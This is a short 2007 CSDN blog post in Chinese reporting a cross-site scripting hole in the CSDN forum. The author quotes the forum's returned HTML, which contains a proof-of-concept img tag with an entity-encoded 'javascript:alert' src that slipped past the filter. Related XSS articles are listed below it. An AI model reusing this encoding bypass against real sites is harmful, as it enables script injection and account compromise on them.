CSDN论坛的跨站漏洞

最新推荐文章于 2024-07-12 16:27:40 发布
最新推荐文章于 2024-07-12 16:27:40 发布
阅读量1.7k 收藏
点赞数
文章标签: class table button javascript input function
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/chaircat/article/details/1866980
版权

鉴于CSDN的论坛出现严重跨站漏洞...

本人决定暂且不上...特此声明... 截图

返回的代码如下...

一个编码就过了...真让人心寒啊...

  < input  type ="button"  value ="举报"  onclick ="window.location.href='mai'+'lto:'+'myc'+'sdn@c'+'sdn.n'+'et?subject=CSDN Topic Report';return false" >
  < input  type ="button"  value ="TOP"  onclick ="window.location.href='#top'" >   </ td ></ tr ></ table ></ td ></ tr ></ table >
< table  class ="item reply"  csdnid ="reply_45922064"  cellspacing ="1" >< tr >   < td  class ="info" >
    < ul >< li  class ="username" >< target ="_blank"  href ="http://hi.csdn.net/chaircat"  onmouseover ="javascript:showUserCard();" >< img  alt =""  src ="/u/ui/images/blank.gif"  class ="userstatus"   />< var  csdnid ="Reply_Username" > chaircat </ var ></ a ></ li >
    < li  class ="nickname" >< textarea  csdnid ="Reply_NickName"  cols =""  rows =""  readonly ="readonly" > chaircat </ textarea ></ li >
    < li  class ="grade" > 等 级: < img  alt =""  csdnid ="Reply_UserRank"  class ="grade user5"  src ="/u/ui/images/blank.gif"   /></ li ></ ul ></ td >
    < td  class ="main" >< table  cellspacing ="0"  style ="height: 100%;" >
   < tr >< td  class ="floor" >< span > 发表于: < var  csdnid ='Reply_Date' > 2007-11-05 08:10:28 </ var ></ span >< var  csdnid ="Reply_Layer" > 6 </ var > &nbsp; 得分: < var  csdnid ='Reply_Point' > 0 </ var ></ td ></ tr >
   < tr >< td  csdnid ="Reply_Body"  class ="content" > 啊哈哈哈哈~~~XSS~~~~  < br  />  好了~~~CSDN的兄弟们有的忙了~~~  < br  />  印象中DV过滤的还可以...还有Discuz...  < br  />   < img  src ="j&#97v&#97scrip&#116&#58alert(/跨站跨站I love you~~/)"   alt =""   /></ td ></ tr >< tr >< td  csdnid ="Reply_ModifyInfo" ></ td ></ tr >< tr >< td  class ="function" >
   <!--  <span>预留的文字链广告位</span> // -->
chaircat
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
漏洞笔记】jQuery跨站脚本
TeamsSix 的 CSDN 空间
11-20 1989
0x00 概述 漏洞名称:jQuery跨站脚本 风险等级:低危 问题类型:使用已知漏洞的组件 0x01 漏洞描述 关于jQuery:jQuery是美国程序员John Resig所研发的一套开源、浏览器的JavaScript库。该库简化了HTML与JavaScript之间的操作,并具有模块化、插件扩展等特点。 漏洞原理:jQuery中过滤用户输入数据所使用的正则表达式存在缺陷,可能导致 locat...
XSS跨站脚本漏洞简介、原理及防护方法
m0_54899775的博客
03-21 7854
XSS跨站脚本漏洞简介、原理及防护方法 XSS跨站漏洞原理及防护
跨站漏洞
u010139452的博客
02-28 761
跨站漏洞   跨站漏洞是由于程序员在编写程序时对用户提交的数据没有做充分的合规性判断和进行HTML编码处理,直接把数据输出到浏览器客户端,这样导致用户可以提交一些特意构造的脚本代码或HTML标签代码,并在输出到浏览器时被执行。黑客利用跨站漏洞输入恶意的脚本代码,当恶意的代码被执行后就形成了所谓的跨站攻击。一般来说对于人机交互比较高的程序,比如论坛,留言板这类程序都比较容易进行跨站攻击。
XSS跨站漏洞详解
qq_44790964的博客
10-31 276
以前的会碰到一些注入 传文件漏洞 但是现在的不会有很多了 挖xss干嘛呢?主要是就是让它来帮我们达到cookie 得到管理员后台 会把管理员的后台地址发送给你 挖掘 闭合 绕过 什么是XSS呢 什么是跨站脚本呢 XSS脚本实例 XSS的危害 javascript简介 一般xss攻击的是客户端浏览器 最终攻击影响的是浏览器 document对象 标签 属性 元素 样式 都可以调用 javas...
伪造gif文件的处理
12-02
用于asp上传组件中出现漏洞处理措施 用于asp上传组件中出现漏洞处理措施 用于asp上传组件中出现漏洞处理措施 用于asp上传组件中出现漏洞处理措施
跨站脚本漏洞-XSS
夜行者的博客
02-18 1763
xss攻击是指利用网页的漏洞注入恶意的指令代码到网页,使得用户加载并执行攻击者恶意制造的网页程序,XSS攻击可以窃取cookie从而获得用户的账号和个人信息,网挂马,有限的键盘信息,发送广告和垃圾短息。 XSS漏洞分为三种,存储型,反射型和DOM型。 检测方法: 1.通过扫描工具appscan或者burpsuite工具扫描,查看与验证扫描结果中的XSS漏洞 2.反射型XSS,在请求的url的参数后面拼接XSS脚本,看是否能正常执行 3.存储型XSS,在保存数据的时候输入XSS脚本,检查数据是否能
【Web漏洞探索】跨站脚本漏洞
kjcxmx的博客
08-03 3973
跨站脚本(Cross-site scripting简称为"CSS",为避免与前端叠成样式表的缩写"CSS"冲突,故称为XSS)允许攻击者破坏用户与易受攻击的应用程序的交互。它允许攻击者绕过同源策略,该策略旨在将不同的网相互隔离。跨站点脚本漏洞通常允许攻击者伪装成受害者用户,执行用户能够执行的任何操作,并访问用户的任何数据。如果受害者用户在应用程序中具有特权访问权限,那么攻击者可能能够完全控制应用程序的所有功能和数据。XSS跨站脚本是一种网应用程序的安全漏洞攻击,是代码注入的一种。...
jsp页面中的跨站脚本漏洞修复
laoshanbizu的专栏
01-23 669
最近公司负责的几个系统中老有漏洞被搜出,多少都是JSP跨站脚本漏洞攻击,总结出的原因,无外呼是在跳转到JSP的页面中带有参数,然后JSP页面接收到参数后没有对一些特殊字符进行过滤,当然,还有一些其他的情况,比如,在页面中有输入框,需要用户手动输入内容时,都有可能出现这种攻击,下面是我针对JSP页面接收参数时,对参数进行过滤处理的方法,可能不全,还请大神指点! 请求链接: http://a.b...
WEB漏洞-XSS跨站脚本漏洞解决方案参考
weixin_61503139的博客
01-10 599
WEB漏洞-XSS跨站脚本漏洞解决方案-CSDN博客Java使用过滤器防止XSS脚本注入_防注入 参数过滤-CSDN博客
XSS跨站脚本攻击剖析与防御
04-28
XSS跨站脚本攻击剖析与防御是一本专门剖析XSS安全的专业书,总共8章,主要包括的内容如下。第1章 XSS初探,主要阐述了XSS的基础知识,包括XSS的攻击原理和危害。第2章 XSS利用方式,就当前比较流行的XSS利用方式做了...
web中间件常见漏洞总结.pdf
12-14
2. **跨站脚本(XSS)**:XSS漏洞允许攻击者在页面中注入恶意脚本,这些脚本可在用户的浏览器中执行,可能导致窃取cookie、会话劫持或其他恶意行为。 3. **跨站请求伪造(CSRF)**:CSRF攻击利用了浏览器的自动身份...
PHP漏洞全解
02-12
4、脚本攻击(Cross Site Scripting, XSS) 5、SQL 注入攻击(SQL injection) 6、请求伪造攻击(Cross Site Request Forgeries, CSRF) 7、Session 会话劫持(Session Hijacking) 8、Session 固定攻击(Session...
漏洞检测检测工具
08-23
2. **漏洞分类**:漏洞可以分为不同类型,如缓冲区溢出、注入攻击(SQL注入、命令注入)、跨站脚本(XSS)、权限提升、拒绝服务(DoS)等。每种类型都有特定的利用方式和防范措施。 3. **漏洞检测方法**:常见的...
thinkphp 一键漏洞检测
12-09
通过自动化的漏洞扫描,可以发现潜在的安全弱点,例如SQL注入、XSS跨站脚本、文件包含漏洞、命令执行等。这些漏洞如果不及时处理,可能会导致数据泄露、系统瘫痪甚至被黑客控制。因此,使用"thinkphp 一键漏洞检测...
更新商品前端接口编写
最新发布
weixin_55639995的博客
07-12 243
那么在vue运行的时候,会加载所有的ref属性特征的元素还有组件。标签中ref的作用就是将 该组件注册到vue对象的ref属性中。使用插槽,那个scope就是代表着一行的数据。然后里面的选项遍历的是 js定义的数据。如果文字显示过多可以使用 文本隐藏显示。表单绑定还有表单数据的绑定。数据绑定使用的表单绑定状态。写form表单然后封装数据。状态的选择使用的是选择框。副标题使用的是文本域。状态页面使用,下拉框。富文本选择器使用组件。使用后端枚举类型去写。
vue 自定义滚动条同步拖动(移动端)
u014206461的博客
07-12 99
vue 自定义滚动条同步拖动(移动端)
什么是防抖和节流?如何理解它们并在不同的场景条件下灵活运用?
Vinca@的博客
07-08 877
防抖(Debouncing)和节流(Throttling)是两种常见的性能优化技术,常用于控制某些操作(例如事件处理器)的频率,从而减少资源消耗并提高性能。防抖:在事件停止触发后的指定时间内执行函数。适用于需要等用户停止操作后再处理事件的场景。节流:在指定时间间隔内最多执行一次函数。适用于需要限制函数执行频率的场景。滚动停止后的操作:使用防抖。滚动过程中的持续操作:使用节流。根据具体需求选择适合的优化技术可以有效提高应用性能和用户体验。
Webkit简介以及工作流程
读心悦
07-10 308
WebKit是一个开源的浏览器引擎,最初由苹果公司基于KHTML(K Desktop Environment的HTML渲染引擎)开发,并广泛应用于Safari浏览器。随着时间的推移,WebKit也被其他多款浏览器和应用所采用,成为Web技术生态中的重要一员。WebKit的核心功能包括解析HTML、CSS、JavaScript等网页内容,并将其渲染为可视化的网页页面。它主要由WebCore(负责HTML解析、CSS样式计算和布局)和JavaScriptCore(负责JavaScript解释执行)两大部分组成。
web漏洞教程 csdn
01-17
Web漏洞教程是指通过CSDN(中国最大的IT社区)等平台上提供的教程,学习和分享有关Web应用程序的各种漏洞和安全问题的知识。 首先,Web漏洞是指网或Web应用程序中存在的安全弱点,可能导致攻击者利用这些漏洞进一步入侵网、窃取用户信息或者执行其他恶意行为。理解和学习Web漏洞的原理和方法非常重要,既可以帮助开发人员修复漏洞,还可以帮助安全专家检测和防止这些漏洞被攻击者利用。 CSDN等平台上提供的Web漏洞教程包括但不限于以下几个方面: 1. 常见Web漏洞类型的介绍,如跨站脚本攻击(XSS)、跨站请求伪造(CSRF)、SQL注入、文件包含漏洞等。通过学习这些漏洞类型,可以帮助开发者和安全专家了解这些漏洞的工作原理和危害程度。 2. Web漏洞的检测方法和工具的介绍。学习使用各种漏洞扫描工具和漏洞验证工具,可以帮助安全专家发现和验证Web应用程序中的漏洞。 3. Web漏洞修复和防御的方法和策略。包括代码安全编码规范、安全配置、输入验证、输出过滤等措施,可以帮助开发人员修复和防止Web漏洞的出现。 通过学习Web漏洞教程,可以提高我们对Web安全的认识和意识,了解攻击者可能利用的漏洞和攻击方法,从而更好地保护自己的Web应用程序和用户数据的安全。在网络安全领域中,学习与分享是非常重要的一部分,因为只有与攻击者保持同步的知识和技术才能有效地保护我们的网络和数据。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值